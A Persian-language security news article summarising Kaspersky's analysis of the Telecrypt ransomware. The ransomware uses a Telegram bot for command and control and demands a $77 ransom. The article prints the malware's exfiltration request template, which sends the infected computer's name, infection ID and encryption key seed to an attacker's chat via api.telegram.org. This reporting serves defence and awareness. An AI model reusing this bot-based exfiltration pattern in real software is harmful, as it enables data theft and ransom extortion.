باج‌افزاری که از تلگرام سوءاستفاده می‌کند| مهندسین تحلیل گران آتی نگر
" ;
LiveZilla Live Help
خانه شبکه و امنیت شبکه (Network and Network Security), مقالات باج‌افزاری که از تلگرام سوءاستفاده می‌کند

باج‌افزاری که از تلگرام سوءاستفاده می‌کند
Share on Google+

به این مقاله امتیاز بدهید

 

پژوهشگران امنیتی به‌تازگی موفق شده‌اند یک باج‌افزار جدید رمزکننده فایل‌ها را شناسایی کنند. آن‌ها این باج‌افزار را Telecrypt نامیده‌اند. این باج‌افزار جدید از برنامه پیام‌رسان تلگرام برای برقراری ارتباط با مرکز کنترل و فرمان‌دهی خود استفاده می‌کند.

همچنین به قربانیان خود اجازه می‌دهد از طریق تلگرام با مهاجم در ارتباط باشند و پیام‌هایی را برای او ارسال کنند. کارشناسان آزمایشگاه امنیتی کسپرسکی، این بدافزار را که Trojan-Ransom.Win32.Telecrypt نام دارد، شناسایی کرده‌اند. گزارش این شرکت نشان می‌دهد که در حال حاضر، ساکنان روسیه هدف این باج‌افزار هستند. نکته جالب توجه در این باج‌افزار، مکانیزم ارتباطی آن است؛ گروه طراحی این باج‌افزار برای اینکه مجبور نباشند یک سرویس جدید ارتباطی برای خودشان طراحی کنند، از پروتکل ارتباطی تلگرام سوءاستفاده کرده‌اند. این تروجان که به زبان برنامه‌نویسی دلفی نوشته شده است، زمانی‌که اجرا می‌شود، یک کلید رمزنگاری و شناسه آلودگی ایجاد می‌کند. در گام بعد، یک بات تلگرام ایجاد کرده و از طریق توابع واسط برنامه‌نویسی تلگرام به هکر اعلام می‌کند که فرایند آلوده کردن قربانی با موفقیت به پایان رسیده است. در ادامه، تروجان درخواستی را با استفاده از تابع sendMessage ارسال می‌کند. این تابع به بات اجازه می‌دهد پیام‌ها را برای شماره خاصی ارسال کند.

Download-Telegram-App-For-PC-Laptop-Windows-XP-7-8-MAC-OS

ترکیب نحوی مورد استفاده این تروجان به این شرح است:

api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

تروجان پارامترهای زیر را همراه با درخواست خود ارسال می‌کند:

<chat> – number of the chat with the cybercriminal;
<computer_name> – name of the infected computer;
<infection_id> – infection ID;
<key_seed> – number used as a basis to generate the file encryption key.

حتما بخوانید   رمز نگاری اطلاعات بی فایده است؛ شما باز هم هک میشوید!

در ادامه، شماره تلفن، نام کامپیوتر، شناسه آلودگی و مقدار اولیه متعلق به کلید رمزنگاری را برای هکر ارسال می‌کند. بعد از اینکه موفق شد اطلاعات مربوط به دستگاه آلوده قربانی را به دست آورد، هارددیسک قربانی را پویش کرده و سعی می‌کند فایل‌های خاصی را شناسایی و رمزنگاری کند. گزارش کسپرسکی نشان می‌دهد که در بعضی موارد، باج‌افزار به انتهای تعدادی از فایل‌ها پسوند .Xcri را افزوده است. با وجود این، در بعضی موارد در حالی که فایل‌ها رمزنگاری شده بودند، فرمت فایلی آن‌ها همچنان بدون تغییر باقی مانده بود. زمانی‌که فایل‌ها روی سامانه قربانی رمزنگاری شدند، بدافزار یک فایل اجرایی را از یک سایت وردپرسی آلوده دانلود می‌کند. این ماژول دانلودشده که هکرها آن را آگاهی‌رسان نام‌گذاری کرده‌اند، پیغام دریافت باج را به قربانیان خود نشان می‌دهد. در ادامه، به قربانیان اعلام می‌کند که برای دسترسی مجدد به فایل‌های خود باید ۷۷ دلار به عنوان باج پرداخت کنند. قربانیان می‌توانند باج را از طریق سرویس‌های پرداختی همچون Qiwi یا Yandex.Money برای هکرها ارسال کنند. صفحه‌ای که پیام درخواست باج در آن قرار دارد، مشتمل بر یک بخش متنی است که از طریق آن، قربانیان می‌توانند با مهاجم در ارتباط باشند. این بخش متنی نیز از سرویس‌های تلگرام برای مقاصد خود سوءاستفاده می‌کند.
پژوهشگران امنیتی پس از بررسی محتوای پیغام ظاهرشده و ویژگی‌های دیگری که در این باج‌افزار استفاده شده است، حدس زده‌اند که طراح یا طراحان این باج‌افزار افراد حرفه‌ای و خبره نیستند. نکته دیگر این است که فرایند رمزنگاری که این باج‌افزار از آن استفاده کرده است، چندان پیشرفته و حرفه‌ای نیست. بر همین اساس، پژوهشگران شرکت کسپرسکی در تلاش هستند تا در اولین فرصت کدهای این باج‌افزار را شکسته و آن را رمزگشایی کنند. پژوهشگران کسپرسکی به قربانیان این باج‌افزار پیشنهاد کرده‌اند که باج‌ مربوطه را پرداخت نکنند و با گروه پشتیبانی کسپرسکی تماس بگیرند تا به آن‌ها کمک کنند. آزمایشگاه امنیتی کسپرسکی یکی از اولین شرکت‌های امنیتی است که به NoMoreRansom پیوسته است و همواره تلاش می‌کند ابزارهای رایگانی را به‌منظور رمزگشایی فایل‌هایی که با باج‌افزارهای مختلفی کدگذاری شده‌اند، ارائه کند.

حتما بخوانید   با‌ج‌افزارها از طریق پروتکل ریموت دسکتاپ RDP حمله می‌کنند
بانک مقالات آتی نگر را راحت تر دنبال کنید دنبال کردن کانال تلگرام

مطالب مرتبط

  1. بدون دیدگاه
  1. بدون بازتاب